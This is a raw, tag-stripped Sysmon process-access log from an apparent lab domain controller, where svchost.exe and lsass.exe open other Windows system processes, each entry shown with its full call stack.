13:29:58.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4288-6000-1400-000000009A01}12761404C:\Windows\System32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.920{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.888{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.873{08A6967A-4754-6000-1A05-000000009A01}28843340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.873{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.857{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.857{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.857{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.857{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.857{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.857{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.857{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 